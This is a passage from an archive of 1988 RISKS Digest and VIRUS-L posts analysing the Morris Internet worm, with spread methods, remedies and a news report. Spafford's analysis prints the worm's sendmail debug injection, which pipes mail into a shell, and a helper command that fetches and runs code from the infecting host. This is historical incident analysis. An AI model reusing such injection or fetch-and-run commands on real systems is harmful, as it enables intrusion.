  2111. both programs tried to see which one would work.
  2112.  
  2113. We quoted Henry Petroski here over a year ago to the effect that we do not
  2114. learn from our successes, but that we have an opportunity to learn from our
  2115. failures.  Once again we are presented with the opportunity to learn that many
  2116. of our computer systems have serious security vulnerabilities, and that we need
  2117. to take pains to defend against the really malicious attacks.  Strangely some
  2118. people take heart in the fact that the security attacks to date (whether
  2119. penetrations, exploitations of privilege, Trojan horses, or legitimate viruses)
  2120. have been relatively modest in scale, perhaps to justify the absence of
  2121. concern.  I am afraid that it will take a Chernobyl- or Three-Mile-Island-like
  2122. disaster before the community at large wakes up.  PGN
  2123.  
  2124. ------------------------------
  2125.  
  2126. Date: Thu, 3 Nov 88 16:32:25 EST
  2127. From: bishop@bear.Dartmouth.EDU (Matt Bishop)
  2128. Subject: More on the virus
  2129.  
  2130. ...  This program introduced itself through a bug in sendmail.  At these sites,
  2131. sendmail was compiled and installed with a debugging option turned on.  As near
  2132. as I can figure (I don't have access to the sendmail sources), by giving a
  2133. specific option to the "debug" command in sendmail (there are lots of those,
  2134. controlling what exactly you get information about) you can cause it to execute
  2135. a command.  As sendmail runs setuid to root, guess what privileges the command
  2136. is executed with.  Right.
  2137.    Apparently what the attacker did was this:  he or she connected to sendmail
  2138. (ie, telnet victim.machine 25), issued the appropriate debug command, and had
  2139. a small C program compiled.  (We have it.  Big deal.)  This program took
  2140. as an argument a host number, and copied two programs -- one ending in
  2141. q.vax.o and the other ending in .sun.o -- and tried to load and execute them.
  2142. In those cases where the load and execution succeeded, the worm did two things
  2143. (at least):  spawn a lot of shells that did nothing but clog the process table
  2144. and burn CPU cycles; look in two places -- the password file and the internet
  2145. services file -- for other sites it could connect to (this is hearsay, but I
  2146. don't doubt it for a minute.)  It used both individual .rhost files (which it
  2147. found using the password file), and any other remote hosts it could locate
  2148. which it had a chance of connecting to.  It may have done more; one of our
  2149. machines had a changed superuser password, but because of other factors we're
  2150. not sure this worm did it.
  2151.    This last part is still sketchy; I have the relevant sun.o file and will
  2152. take it apart to see just what it was supposed to do.  As of now, it appears
  2153. there was no serious damage (just wasted CPU cycles and system administrator
  2154. time).
  2155.    Two obvious points:
  2156. 1.  Whoever did this picked only on suns and vaxen.  One site with a lot
  2157.     of IRISes and two Crays (ie, NASA Ames) got bit on their Suns and Vaxen,
  2158.     but the attempt to get the other machines didn't work.
  2159. 2.  This shows the sorry state of software and security in the UNIX world.
  2160.     People should NEVER put a program with debugging hooks in it, especially
  2161.     when the hook is (or can be made) to execute an arbitrary command.  But
  2162.     that is how the sendmail which was used was distributed!
  2163.    One more interesting point:  initially, I thought an application of the
  2164. "principle of least privilege" would have prevented this penetration.  But
  2165. the attacker used a world-writeable directory to squirrel the relevant programs
  2166. in, so -- in effect -- everything could have been done by any user on the
  2167. system!  (Except the superuser password change, of course -- if this worm
  2168. did in fact do it.)
  2169.    I think the only way to prevent such an attack would have been to turn
  2170. off the deug option on sendmail; then the penetration would fail.  It goes to
  2171. show that if the computer is not secure (and like you, I don't believe there
  2172. ever will be such a beastie), there is simply no way to prevent a virus (or,
  2173. in this case, a worm) from getting into that system.
  2174.    I know this is somewhat sketchy, flabby, and fuzzy, but it's all I know
  2175. so far.  I'll keep you posted on developments ...
  2176.  
  2177. Matt
  2178.  
  2179. ------------------------------
  2180. ...
  2181.  
  2182. RISKS-LIST: RISKS-FORUM Digest  Thursday 3 November 1988   Volume 7 : Issue 70
  2183.  
  2184.         FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS
  2185.    ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator
  2186.  
  2187. Contents:
  2188.   Updated worm report (Gene Spafford)
  2189.   A worm "condom" (Gene Spafford)
  2190.   A cure!!!!! (Gene Spafford)
  2191.   Computer Network Disrupted by `Virus' (John Markoff via Geoff Goodfellow)
  2192.   "Annals of Democracy -- Counting Votes" in the New Yorker (Daniel B Dobkin)
  2193.   Comments on the New Yorker article (PGN)
  2194.  
  2195. The RISKS Forum is moderated.  Contributions should be relevant, sound, in good
  2196. taste, objective, coherent, concise, and nonrepetitious.  Diversity is welcome.
  2197. CONTRIBUTIONS to RISKS@CSL.SRI.COM, with relevant, substantive "Subject:" line
  2198. (otherwise they may be ignored).  REQUESTS to RISKS-Request@CSL.SRI.COM.
  2199. FOR VOL i ISSUE j / ftp kl.sri.com / login anonymous (ANY NONNULL PASSWORD) /
  2200.   get stripe:<risks>risks-i.j ... (OR TRY cd stripe:<risks> / get risks-i.j ...
  2201.   Volume summaries in (i, max j) = (1,46),(2,57),(3,92),(4,97),(5,85),(6,95).
  2202.  
  2203. ----------------------------------------------------------------------
  2204.  
  2205. Date: Fri, 04 Nov 88 00:27:54 EST
  2206. From: Gene Spafford <spaf@purdue.edu>
  2207. Subject: Updated worm report
  2208. Organization: SERC, Department of Computer Sciences, Purdue Univ.
  2209.  
  2210. This is an updated description of how the worm works (note: it is
  2211. technically a worm, not a virus, since it does not attach itself
  2212. to other code {that we know about}):
  2213.  
  2214. All of our Vaxen and some of our Suns here were infected with the worm.  The
  2215. worm forks repeated copies of itself as it tries to spread itself, and the load
  2216. averages on the infected machines skyrocketed.  In fact, it got to the point
  2217. that some of the machines ran out of swap space and kernel table entries,
  2218. preventing login to even see what was going on!
  2219.  
  2220. The worm seems to consist of two parts.  The way that it works is as
  2221. follows:
  2222.  
  2223. 1) Virus running on an infected machine opens a TCP connection to a
  2224. victim machine's sendmail, invokes debug mode, and submits a version
  2225. of itself as a mail message.
  2226. *OR* it uses rsh to create itself on the remote machine through
  2227. an account requiring no password (due to hosts.equiv or .rhosts
  2228. entries).  *OR* it gets in via a bug in fingerd *OR* it uses telnet
  2229. (more on this later).
  2230.  
  2231. Using the sendmail route, it does something like:
  2232. From: /dev/null
  2233. To: "|sed -e 1,/^$/d | sh; exit 0"
  2234.  
  2235. cd /usr/tmp
  2236. cat > x14481910.c <<'EOF'
  2237. <text of program deleted?
  2238. EOF
  2239. cc -o x14481910 x14481910.c;x14481910 128.10.2.215 32341 8712440;rm -f x14481910
  2240.  x14481910.c
  2241.  
  2242.  
  2243. 2) This program is a simple "listener" or "helper" program of about a hundred
  2244. lines of fairly simple code.  As you can see, the helper is invoked with
  2245. arguments pointing back at the infecting worm (giving hostid/socket/checksum(?)
  2246. as arguments).
  2247.  
  2248. 3) The helper then connects to the "server" and copies a number of files
  2249. (presumably to /tmp).  After the files are copied, it exec's a shell with
  2250. standard input coming from the infecting worm program on the other end of the
  2251. socket.
  2252.  
  2253. From here, I speculate on what happens since I can't find the source to
  2254. this part lying around on our machines:
  2255.  
  2256. 4) The newly exec'd shell attempts to compile itself from the files copied over
  2257. to the target machine.  The command file it uses is as follows:
  2258.  
  2259. PATH=/bin:/usr/bin:/usr/ucb
  2260. rm -f sh
  2261. if [ -f sh ]
  2262. then
  2263. P=x%d
  2264. else
  2265. P=sh
  2266. cc -o $P %s
  2267. /bin/echo %s
  2268. ./$P -p $$
  2269.  
  2270. 5) This creates and dispatches the new worm..  This worm opens all the worm
  2271. source files, then unlinks the files so they can't be found (since it has them
  2272. open, however, it can still access the contents).  Next, the worm steps through
  2273. the hosts file (on the Sun, it uses YP to step through the distributed hosts
  2274. file) trying to connect to other machines' sendmail.  If a connection succeeds,
  2275. it forks a child process to infect it, while the parent continues to attempt
  2276. infection of other machines.
  2277.  
  2278. 6) The child requests and initializes a new socket, then builds and invokes a
  2279. listener with the new socket number and hostid as arguments (#1, above).
  2280.  
  2281.  
  2282. Other notes:
  2283.  
  2284. The worm runs in stages.  It first collects info from the /etc/hosts files, the
  2285. hosts.equiv file, and other files containing host names and host IP addresses.
  2286. It even runs netstat to find out what networks the machine is attached to! It
  2287. uses this information to attempt to penetrate sendmail on those machines.  It
  2288. also knows how to penetrate "fingerd" on Vaxen (on Suns, the attempt results in
  2289. a core dump).  I will privately tell individuals how to fix the bug in fingerd,
  2290. but for now change it so it does not run as "root".
  2291.  
  2292. After this first stage, it appears to sleep for a while.  Then it starts
  2293. collecting user names and it begins probing with "rsh".  It also tries to
  2294. attack the passwords by trying a set of built-in words, the contents of
  2295. /usr/dict, and words snarfed from system files.  If it succeeds in breaking a
  2296. local password, it forks a child to use telnet to break into that account and
  2297. copy itself.
  2298.  
  2299. As I write this, no one seems to know what it is supposed to eventually do.
  2300. Perhaps it just breaks in everywhere it can.  We do know that if it doesn't
  2301. break into any accounts or systems for a while, it enters a mode where it tries
  2302. to break the root password via brute force searching.  We suspect that if it
  2303. succeeds it then does very nasty things.
  2304.  
  2305. Other notes:
  2306.  
  2307. The program corrupts its argument vector, so it appears in a "ps ax" as "(sh)"
  2308. (a login shell).  Don't trust any of these if you have them running.
  2309.  
  2310. The program doesn't copy around source files (except the helper) -- it copies
  2311. around pre-compiled binaries that are linked on the local machine and then run.
  2312. The worm appears to only be carrying binaries for 68020-based Suns and Vax 7xx
  2313. and 8800 machines.  Pyramids, Sun 2's and Sequents are all definitely immune.
  2314. (Note: an infected 8800 is an awesome engine of contagion.)
  2315.  
  2316. The strings in the binaries are encrypted against a random "strings"
  2317. invocation.  If you have a binary, Keith Bostic informs me that Xor with 0x81
  2318. will reveal interesting things, although that is not the only mask used.
  2319.  
  2320. The first observation of the virus I have heard about was 6pm Wednesday night
  2321. in Pittsburgh.  It didn't hit Purdue until about 4 this morning.  We were lucky
  2322. in that other sites, like CMU and Princeton, were hit around 11 last night.
  2323.  
  2324.  
  2325. Acknowledgements:  Some of the above information was obtained from
  2326. Brian Kantor (UCSD), Keith Bostic (UCB), Thomas Narten (Purdue), Dan
  2327. Trinkle (Purdue), Kevin Braunsdorf (Purdue) and Miek Rowan (Purdue).
  2328. Thanks, guys.
  2329.  
  2330. ------------------------------
  2331.  
  2332. Date: Thu, 03 Nov 88 21:20:10 EST
  2333. From: Gene Spafford <spaf@purdue.edu>
  2334. Subject: A worm "condom"
  2335. Organization: SERC, Department of Computer Sciences, Purdue Univ.
  2336.  
  2337. ... Kevin Braunsdorf & Rich Kulawiec (Purdue-CC) have come up with a "condom"
  2338. to protect your machine against the CURRENT worm.  They are not 100% sure it
  2339. works, but it seems to be completely effective and it can't do any harm.  As
  2340. ROOT, do:
  2341.  
  2342. mkdir /usr/tmp/sh
  2343. chmod 111 /usr/tmp/sh
  2344.  
  2345. Then edit your rc.local file to recreate the directory in case of a reboot.
  2346. This will not stop a current infection, but it will prevent any new ones
  2347. from taking hold -- it prevents the worm from creating replicas.
  2348.  
  2349. ... --spaf
  2350.  
  2351. ------------------------------
  2352.  
  2353. Date: Thu, 03 Nov 88 22:04:15 EST
  2354. From: Gene Spafford <spaf@purdue.edu>
  2355. Subject: A cure!!!!!
  2356. Organization: SERC, Department of Computer Sciences, Purdue Univ.
  2357.  
  2358. FLASH!!
  2359.  
  2360. Kevin ("Adb's your friend.") Braunsdorf just burst into my office
  2361. with a cure discovered in the disassembled worm binary.
  2362.  
  2363. If there is an external variable in the library named "pleasequit" that is
  2364. non-zero, the worm will die immediately after exiting.  Thus, to kill any new
  2365. worms, include a patch in your library that defines the symbol.  The following
  2366. shell file and source code will modify your C library to define this symbol.
  2367.  
  2368. It WON'T kill any currently linked and running versions, but it will
  2369. prevent reinfection.
  2370.  
  2371.  
  2372. # Shar archive.  Give the following as input to /bin/sh
  2373. #  Packed Thu Nov  3 21:56:35 EST 1988 by spaf@uther.cs.purdue.edu
  2374. #
  2375. #  This archive contains:
  2376. #    foo.sh
  2377. #    foo.c
  2378. #
  2379. #
  2380. echo x - foo.sh
  2381. sed 's/^X//' >foo.sh <<'*-*-END-of-foo.sh-*-*'
  2382. Xcc -c foo.c -o foo.o
  2383. Xcp /lib/libc.a /lib/libc.a.old
  2384. Xar q /lib/libc.a foo.o
  2385. Xranlib /lib/libc.a
  2386. *-*-END-of-foo.sh-*-*
  2387. echo x - foo.c
  2388. sed 's/^X//' >foo.c <<'*-*-END-of-foo.c-*-*'
  2389. Xextern int pleasequit = -1;
  2390. *-*-END-of-foo.c-*-*
  2391. exit
  2392.  
  2393. ------------------------------
  2394.  
  2395. Date: Thu, 3 Nov 88 21:30:19 PST
  2396. From: geoff@fernwood.mpk.ca.us (the tty of Geoff Goodfellow)
  2397. Subject: Computer Network Disrupted by `Virus'
  2398.  
  2399. COMPUTER NETWORK DISRUPTED BY `VIRUS'
  2400. By JOHN MARKOFF=
  2401. c.1988 N.Y. Times News Service=
  2402.  
  2403.        In an intrusion that raises new questions about the
  2404. vulnerability of the nation's computers, a nationwide Department of
  2405. Defense data network has been disrupted since Wednesday night by a
  2406. rapidly spreading ``virus'' software program apparently introduced
  2407. by a computer science student's malicious experiment.
  2408.        The program reproduced itself through the computer network,
  2409. making hundreds of copies in each machine it reached, effectively
  2410. clogging systems linking thousands of military, corporate and
  2411. university computers around the country and preventing them from
  2412. doing additional work. The virus is thought not to have destroyed
  2413. any files.
  2414.        By late Thursday afternoon computer security experts were
  2415. calling the virus the largest assault ever on the nation's
  2416. computers.
  2417.        ``The big issue is that a relatively benign software program can
  2418. virtually bring our computing community to its knees and keep it
  2419. there for some time,'' said Chuck Cole, deputy computer security
  2420. manager at Lawerence Livermore Laboratory in Livermore, Calif., one
  2421. of the sites affected by the intrusion. ``The cost is going to be
  2422. staggering.''
  2423.        Clifford Stoll,^ @a computer security expert at Harvard
  2424. University, added: ``There is not one system manager who is not
  2425. tearing his hair out. It's causing enormous headaches.''
  2426.        The affected computers carry routine communications among
  2427. military officials, researchers and corporations.
  2428.        While some sensitive military data are involved, the nation's
  2429. most sensitive secret information, such as that on the control of
  2430. nuclear weapons, is thought not to have been touched by the virus.
  2431.        Computer viruses are so named because they parallel in the
  2432. computer world the behavior of biological viruses. A virus is a
  2433. program, or a set of instructions to a computer, that is
  2434. deliberately planted on a floppy disk meant to be used with the
  2435. computer or introduced when the computer is communicating over
  2436. telephone lines or data networks with other computers.
  2437.        The programs can copy themselves into the computer's master
  2438. software, or operating system, usually without calling any
  2439. attention to themselves. From there, the program can be passed to
  2440. additional computers.
  2441.        Depending upon the intent of the software's creator, the program
  2442. might cause a provocative but otherwise harmless message to appear
  2443. on the computer's screen. Or it could systematically destroy data
  2444. in the computer's memory.
  2445.        The virus program was apparently the result of an experiment by
  2446. a computer science graduate student trying to sneak what he thought
  2447. was a harmless virus into the Arpanet computer network, which is
  2448. used by universities, military contractors and the Pentagon, where
  2449. the software program would remain undetected.
  2450.      A man who said he was an associate of the student said in a telephone
  2451. call to The New York Times that the experiment went awry because of a small
  2452. programming mistake that caused the virus to multiply around the military
  2453. network hundreds of times faster than had been planned.
  2454.        The caller, who refused to identify himself or the programmer,
  2455. said the student realized his error shortly after letting the
  2456. program loose and that he was now terrified of the consequences.
  2457.        A spokesman at the Pentagon's Defense Communications Agency,
  2458. which has set up an emergency center to deal with the problem, said
  2459. the caller's story was a ``plausible explanation of the events.''
  2460.        As the virus spread Wednesday night, computer experts began a
  2461. huge struggle to eradicate the invader.
  2462.        A spokesman for the Defense Communications Agency in Washington
  2463. acknowledged the attack, saying, ``A virus has been identified in
  2464. several host computers attached to the Arpanet and the unclassified
  2465. portion of the defense data network known as the Milnet.''
  2466.        He said that corrections to the security flaws exploited by the
  2467. virus are now being developed.
  2468.        The Arpanet data communications network was established in 1969
  2469. and is designed to permit computer researchers to share electronic
  2470. messages, programs and data such as project information, budget
  2471. projections and research results.
  2472.        In 1983 the network was split and the second network, called
  2473. Milnet, was reserved for higher-security military communications.
  2474. But Milnet is thought not to handle the most classified military
  2475. information, including data related to the control of nuclear
  2476. weapons.
  2477.        The Arpanet and Milnet networks are connected to hundreds of
  2478. civilian networks that link computers around the globe.
  2479.        There were reports of the virus at hundreds of locations on both
  2480. coasts, including, on the East Coast, computers at the
  2481. Massachusetts Institute of Technology, Harvard University, the
  2482. Naval Research Laboratory in Maryland and the University of
  2483. Maryland and, on the West Coast, NASA's Ames Research Center in
  2484. Mountain View, Calif.; Lawrence Livermore Laboratories; Stanford
  2485. University; SRI International in Menlo Park, Calif.; the University
  2486. of California's Berkeley and San Diego campuses and the Naval Ocean
  2487. Systems Command in San Diego.
  2488.        A spokesman at the Naval Ocean Systems Command said that its
  2489. computer systems had been attacked Wednesday evening and that the
  2490. virus had disabled many of the systems by overloading them. He said
  2491. that computer programs at the facility were still working on the
  2492. problem more than 19 hours after the original incident.
  2493.        The unidentified caller said the Arpanet virus was intended
  2494. simply to ``live'' secretly in the Arpanet network by slowly
  2495. copying itself from computer to computer. However, because the
  2496. designer did not completely understand how the network worked, it
  2497. quickly copied itself thousands of times from machine to machine.
  2498.      Computer experts who disassembled the program said that it was written
  2499. with remarkable skill and that it exploited three security flaws in the Arpanet
  2500. network.  [No. Actually UNIX] The virus' design included a program designed to
  2501. steal passwords, then masquerade as a legitimate user to copy itself to a
  2502. remote machine.
  2503.        Computer security experts said that the episode illustrated the
  2504. vulnerability of computer systems and that incidents like this
  2505. could be expected to happen repeatedly if awareness about computer
  2506. security risks was not heightened.
  2507.        ``This was an accident waiting to happen; we deserved it,'' said
  2508. Geoffrey Goodfellow,''(*) president of Anterior Technology Inc. and an
  2509. expert on computer communications.
  2510.        ``We needed something like this to bring us to our senses. We
  2511. have not been paying much attention to protecting ourselves.''
  2512.        Peter Neumann, a computer security expert at SRI International
  2513. Inc. in Menlo Park International, said: ``Thus far the disasters we
  2514. have known have been relatively minor. The potential for rather
  2515. extraordinary destruction is rather substantial.
  2516.      ``In most of the cases we know of, the damage has been immediately
  2517. evident. But if you contemplate the effects of hidden programs, you could
  2518. have attacks going on and you might never know it.''
  2519.  
  2520.   [* Following is Geoff's full quote ("exploitation"), which John only
  2521.   partially integrated with Geoff's earlier off-the-cuff comment ("accident"):
  2522.  
  2523.     "This was an exploitation wanting to happen.  We deserved it.  We needed
  2524.     something like this to bring us to our senses.  We have not been paying
  2525.     much attention to protecting ourselves.  The blame does not rest on the R&D
  2526.     community as a whole.  Look how many manufacturers [...] just took the
  2527.     original computer-science-department developed code willy-nilly, put their
  2528.     wrapper and corporate logo on it, and resold it to customers.  That's the
  2529.     real travesty here, we build these systems, OK, that's great, but we rarely
  2530.     build them and then ask how they might be abused, broken, or circumvented"
  2531.     {and then try to break them}.   ]
  2532.  
  2533. ------------------------------
  2534.  
  2535. ...
  2536. =========================================================================
  2537. Date:         Sat, 5 Nov 88 00:31:55 GMT
  2538. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  2539. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  2540. From:         ZDEE731@ELM.CC.KCL.AC.UK
  2541. Subject:      VMS/VAX
  2542.  
  2543. HAVE ANY VIRUSES BEEN DISCOVERED ON VMS/VAX?
  2544.  
  2545. REGARDS BOB (UK)
  2546. UK.AC.KCL.CC.ELM
  2547. =========================================================================
  2548. Date:         Fri, 4 Nov 88 21:12:27 EST
  2549. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  2550. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  2551. From:         Joe Sieczkowski <joes@SCARECROW.CSEE.LEHIGH.EDU>
  2552. Subject:      RE: Internet Worm
  2553.  
  2554.  
  2555. I'd like to remind everyone to always read and evaluate the
  2556. "fixes" they apply.  One of the best ways to spread a malicious
  2557. program is to present it as a security patch.  Not that this
  2558. has happened during this particular incident, but it could especially
  2559. considering fixes are forwarded from a to b to c...etc.
  2560.  
  2561. Always make sure you understand the problem, and understand the patch
  2562. being applied.  Apply the patch to the source if possible.  Be
  2563. especially wary of binary patches since they are particularly
  2564. difficult to examine without disassembling a good portion of the
  2565. executable.
  2566.  
  2567. Good Luck,
  2568.  
  2569.  
  2570.   joes@scarecrow.csee.lehigh.edu         Joe Sieczkowski
  2571.   joes@lehi3b15.UUCP                     AI Lab, CSEE Department
  2572.   jws5@lehigh.bitnet                     Lehigh University
  2573.                                          Packard Laboratory #19
  2574.                                          Bethlehem, PA 18015
  2575.  
  2576.  
  2577. =========================================================================
  2578. Date:         Fri, 4 Nov 88 21:52:58 EST
  2579. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  2580. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  2581. From:         "Mark W. Eichin" <eichin@ATHENA.MIT.EDU>
  2582. Subject:      Internet Virus
  2583.  
  2584. A team at MIT and a team at UCB worked Thursday evening through until
  2585. Friday morning both examining the Virus in isolation and reverse
  2586. engineering to create C code that could produce the binary output we
  2587. had in hand.
  2588.  
  2589. MIT had a Press Conference at 12Noon Friday, 4 November; about 20
  2590. minutes earlier, we had determined that with the modules we had
  2591. received from Berkeley and the work we had done at MIT we indeed had a
  2592. complete knowledge of the inner workings of the Virus, permitting us
  2593. to declare that there was no code in the virus designed to harm files.
  2594.  
  2595. The Berkeley group was lead by Keith Bostic (I don't have details on
  2596. his group); the MIT group was a collection of programmers from various
  2597. organizations including Project Athena, LCS, SIPB, and Telecom. Stan
  2598. Zanarotti and I led a group of around 6 in the reverse engineering
  2599. effort, while others worked on using Netwatch on an isolated testbed
  2600. machine.
  2601.  
  2602. The Virus uses three possible paths to transmit itself from one
  2603. machine to another:
  2604.     1) finger (via a bug in /etc/fingerd which turned out to be
  2605. difficult for the Virus to exploit)
  2606.     2) sendmail (via the `debug' command, which should be turned
  2607. off in a production server, but apparently was turned on by default in
  2608. the binary BSD distribution)
  2609.     3) password guessing and shell/rexec/rsh/telnet logins.
  2610.  
  2611. Whichever method used, it attempted to run a /bin/sh on the remote
  2612. machine, and then feed it a set of commands which caused it to build a
  2613. new program and suck over an unlinked VAX or Sun image. It then linked
  2614. this with the system's local libraries, and executed it.
  2615.  
  2616. Once the virus was running on the new site, it chose a variety of
  2617. paths to find new hosts to propogate to:
  2618.     1) routing tables
  2619.     2) interface tables
  2620.     3) user .forward files
  2621.     4) user .rhosts files
  2622.     5) /etc/hosts.equi
  2623.  
  2624. Note that it did *not* make any use of the inherent security problems
  2625. commonly involved with .rhosts files, it merely used them as a source
  2626. of hostnames.
  2627.  
  2628. [I'll cut this short now, I need the sleep...]
  2629.  
  2630. Project Athena was not vulnerable to the finger attack at all; one or
  2631. two private machines were vulnerable to the `debug' attack, but at
  2632. least one was an IBM RT/PC (which the Virus could `live' on.) What did
  2633. hit several Athena machines was the use of password guessing; this is
  2634. really more of a Human Security problem than a Computer Security
  2635. problem. Other MIT machines were hit by various combinations of the
  2636. several attacks.
  2637.  
  2638. There were several bugs in the Virus itself, which Keith Bostic
  2639. suggested posting patches for. It also seems clear that the original
  2640. design did not intend for it to hog resources as it did, but merely to
  2641. propagate quietly, which would have certainly been interesting.
  2642.  
  2643. Very little effort was made to actually hide the behavior of the code
  2644. (it even had a reasonably large symbol table, making it easier to
  2645. identify subroutines.) It *did* attempt to hide at a higher level, for
  2646. example by calling itself "sh" and destroying its argument list (to
  2647. make it appear in the process table as ``some random shell script'').
  2648.  
  2649. I will try and post more details as I have time to write them up.
  2650.  
  2651.                 Mark Eichin
  2652.             <eichin@athena.mit.edu>
  2653.         SIPB Member & Project Athena ``Watchmaker''
  2654.  
  2655. =========================================================================
  2656. Date:         Fri, 4 Nov 88 15:33:00 CST
  2657. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  2658. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  2659. From:         Ken  De Cruyenaere   204-474-8340 <KDC@UOFMCC>
  2660. Subject:      Latest VIRUS to make the news
  2661.  
  2662. This "virus" has been a hot topic of the news media today.
  2663. Surprised that no discussion has reached this list yet.
  2664. The following is from RISKS digest received this morning:
  2665. ----------------------------------------------------------------------
  2666.  
  2667. Date:  Thu, 3 Nov 88 06:46 EST
  2668. From: Stoll@DOCKMASTER.ARPA
  2669. Subject:  Virus on the Arpanet - Milnet
  2670.  
  2671. Re Arpanet "Sendmail" Virus attack November 3, 1988
  2672.  
  2673. Hi Gang!
  2674.  
  2675. It's now 3:45 AM on Wednesday 3 November 1988.  I'm tired, so don't believe
  2676. everything that follows...
  2677.  
  2678. Apparently, there is a massive attack on Unix systems going on right now.
  2679.  
  2680. I have spoken to systems managers at several computers, on both the east
  2681. & west coast, and I suspect this may be a system wide problem.
  2682.  
  2683. Symptom:  hundreds or thousands of jobs start running on a Unix system
  2684. bringing response to zero.
  2685.  
  2686. Systems attacked:  Unix systems, 4.3BSD unix & variants (eg:  SUNs) any
  2687. sendmail compiled with debug has this problem.  See below.
  2688.  
  2689. This virus is spreading very quickly over the Milnet.  Within the past 4
  2690. hours, I have evidence that it has hit >10 sites across the country,
  2691. both Arpanet and Milnet sites.  I suspect that well over 50 sites have
  2692. been hit.  Most of these are "major" sites and gateways.
  2693.  
  2694.  
  2695. Method:
  2696.  
  2697. Apparently, someone has written a program that uses a hole in SMTP
  2698. Sendmail utility.  This utility can send a message into another program.
  2699.  
  2700. Step 1:  from a distant Milnet host, a message is sent to Sendmail
  2701.        to fire up SED, (SED is an editor)  This is possible in certain
  2702.        versions of sendmail (see below).
  2703.  
  2704. 2:  A 99 line C program is sent to SED through Sendmail.
  2705.  
  2706. 3:  The distant computer sends a command to compile this C program.
  2707.  
  2708. 4:  Several object files are copied into the Unix computer.
  2709.         There are 3 files:  one targeted to Sun
  2710.                             one targeted to SUN-3
  2711.                             one targeted to vax    (ultrix probably, not vms)
  2712.  
  2713. 5:  The C program accepts as address other Milnet sites
  2714.  
  2715. 6:  Apparently, program scans for other Milnet/arpanet addresses and
  2716.      repeats this process.
  2717.  
  2718.  
  2719.  
  2720. The bug in Sendmail:
  2721.  
  2722. When the Unix 4.3 BSD version of Sendmail is compiled with the Debug
  2723. option, there's a hole in it.
  2724.  
  2725. Most Unix systems (BSD 4.3 and Suns) apparently do not have this bug.
  2726. It exists only where the system manager recompiled Sendmail and enabled
  2727. debugging.
  2728.  
  2729.  
  2730. This is bad news.
  2731.  
  2732.   Cliff Stoll dockmaster.arpa
  2733.  
  2734. ------------------------------
  2735.  
  2736. Date: Thu, 03 Nov 88 09:52:18 EST
  2737. From: Gene Spafford <spaf@purdue.edu>
  2738. Subject: More on the virus
  2739. Organization: SERC, Department of Computer Sciences, Purdue Univ.
  2740.  
  2741. All of our Vaxen and some of our Suns here were infected with the virus.  The
  2742. virus forks repeated copies of itself as it tries to spread itself, and the
  2743. load averages on the infected machines skyrocketed.  In fact, it got to the
  2744. point that some of the machines ran out of swap space and kernel table entries,
  2745. preventing login to even see what was going on!
  2746.  
  2747. The virus seems to consist of two parts.  I managed to grab the source code for
  2748. one part, but not the main component (the virus cleans up after itself so as
  2749. not to leave evidence).  The way that it works is as follows:
  2750.  
  2751. 1) Virus running on an infected machine opens a TCP connection to a
  2752. victim machine's sendmail, invokes debug mode, and gets a shell.
  2753.  
  2754. 2) The shell creates a file in /tmp named $$,l1.c (where the $$ gets replaced
  2755.  
  2756. by the current process id) and copies code for a "listener" or "helper"
  2757. program.  This is just a few dozen lines long and fairly generic code.  The
  2758. shell compiles this helper using the "cc" command local to the system.
  2759.  
  2760. 3) The helper is invoked with arguments pointing back at the infecting
  2761. virus (giving hostid/socket/passwords as arguments).
  2762.  
  2763. 4) The helper then connects to the "server" and copies a number of files
  2764. (presumably to /tmp).  After the files are copied, it exec's a shell with
  2765. standard input coming from the infecting virus program on the other end of the
  2766. socket.
  2767.  
  2768. From here, I speculate on what happens since I can't find the source to
  2769. this part lying around on our machines:
  2770.  
  2771. 5) The newly exec'd shell attempts to compile itself from the files copied over
  2772. to the target machine.  I'm not sure what else the virus does, if anything --
  2773. it may also be attempting to add a bogus passwd file entry or do something to
  2774. the file system.  The helper program has an array of 20 filenames for the
  2775. "helper" to copy over, so there is room to spare.  There are two versions
  2776. copied -- a version for Vax BSD and a version for SunOS; the appropriate one is
  2777. compiled.
  2778.  
  2779. 6) The new virus is dispatched.  This virus opens all the virus source
  2780. files, then unlinks the files so they can't be found (since it has them
  2781. open, however, it can still access the contents).  Next, the virus
  2782. steps through the hosts file (on the Sun, it uses YP to step through
  2783. the distributed hosts file) trying to connect to other machines'
  2784. sendmail.  If a connection succeeds, it forks a child process to infect
  2785. it, while the parent continues to attempt infection of other machines.
  2786.  
  2787. 7) The child requests and initializes a new socket, then builds and invokes a
  2788. listener with the new socket number and hostid as arguments (#1, above).
  2789.  
  2790. The heavy load we see is the result of multiple viruses coming in from multiple
  2791. sites.  Since local hosts files tend to have entries for other local hosts, the
  2792. virus tends to infect local machines multiple times -- in some senses this is
  2793. lucky since it helps prevent the spread of the virus as the local machines slow
  2794. down.
  2795.  
  2796. The virus also "cleans" up after itself.  If you reboot an infected machine (or
  2797. it crashes), the /tmp directory is normally cleaned up on reboot.  The other
  2798. incriminating files were already deleted by the virus itself.
  2799.  
  2800. Clever, nasty, and definitely anti-social.
  2801.  
  2802. --spaf
  2803.  
  2804. ------------------------------
  2805.  
  2806. Date: Thu, 3 Nov 1988 14:27:22 PDT
  2807. From: Peter Neumann <neumann@csl.sri.com>
  2808. Subject: More on the virus attack
  2809.  
  2810. Remember that the above are preliminary messages relating to an event in
  2811. progress.  There seem to be many unanswered questions.  Perhaps someone will
  2812. contribute a definitive report to the next issue of RISKS.
  2813.  
  2814. Examination of the code suggests a fairly sophisticated person writing
  2815. relatively high quality (although undocumented) code, exploiting several flaws
  2816. that exist(ed) on many UNIX systems, and written with considerable good
  2817. practice in self-checking, reliability, etc.  From the evidence thus far, I
  2818. would guess it that this was a deliberate attack, not an accidental experiment
  2819. run astray.
  2820.  
  2821. Although it was primarily a denial of service attack, it did some remarkable
  2822. things, taking advantage of many different approaches.  The spawned
  2823. processes appear to have been doing attacks on encrypted passwords to enable
  2824. ftps (in case the .rhost attack would not work -- cf. the Stanford breakins
  2825. described in CACM and SEN by Brian Reid).  Separate versions to run on Suns
  2826. and Vaxens were apparently propagated in DES encrypted form, decrypted, and
